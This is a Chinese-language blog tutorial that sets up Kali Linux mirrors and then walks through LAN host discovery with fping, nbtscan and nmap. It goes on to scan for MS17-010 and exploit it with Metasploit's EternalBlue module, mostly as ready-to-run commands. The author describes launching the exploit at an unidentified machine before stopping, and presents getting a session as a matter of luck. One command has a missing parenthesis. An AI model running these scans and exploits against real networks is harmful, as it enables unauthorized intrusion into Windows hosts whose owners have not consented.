- 编辑kali的源为国内源
1.#阿里云Kali源
2.deb http://mirrors.aliyun.com/kali kali main non-free contrib
3.deb-src http://mirrors.aliyun.com/kali kali main non-free contrib
4.deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free
- 更新应用
apt-get update && apt-get upgrade && apt-get dist-upgrade
- 更新系统内核
apt-get install linux-headers-$(uname -r)
- 如果报错可以试试这个
aptitude -r install linux-headers-$(uname -r
- 主机存活检测
# fping 工具 kali自带
fping -asg 192.168.1.0/24
1.jpg
# nbtscan工具 kali自带
nbtscan -r 192.168.1.0/24
2.jpg
# nmap ping 包扫描
nmap -n -sS 192.168.1.0/24
# 指定端口发现扫描
nmap -n -p445 192.168.1.0/24 --open
# 针对漏洞脚本的定向扫描
nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open
# 个人推荐使用 nmap -n -p445 192.168.1.0/24 --open 其扫描发现的效率最高。
3.jpg
- MSF Auxiliary 辅助扫描
msfconsole # 进入MSF框架
version # 确认下MSF的版本
search ms17_010 # 查找漏洞模块的具体路径
use auxiliary/scanner/smb/smb_ms17_010 # 调用漏洞扫描模块
show options # 查看模块配置选项
set RHOST 192.168.1.1-254 # 配置扫描目标
set THREADS 30 #配置扫描线程
run #运行脚本
- 这个使用下来,我们发现其实还没有namp 一条命令就搞定了,来的方便。
- 上边的都是为了扫描开放端口的主机,接下来利用漏洞获取权限
ms17-010 漏洞利用之MSF使用方法
msfconsole # 进入MSF 框架
version # 确保MSF框架版本在 4.14.17以上;
search ms17_010 # 漏洞模块路径查询
use exploit/windows/smb/ms17_010_eternalblue # 调用攻击模块
set RHOST 192.168.1.112 # 设定攻击目标
exploit # 发起攻击
-
查找漏洞模块路径
4.jpg -
调用和配置exploit攻击参数
5.jpg -
设置工具目标
6.jpg -
发起攻击 exploit 或者 run
7.jpg - 我手动终止了,不知道这是什么机器,不乱搞了,如果成功会直接返回会话(看各位的运气了!)
网友评论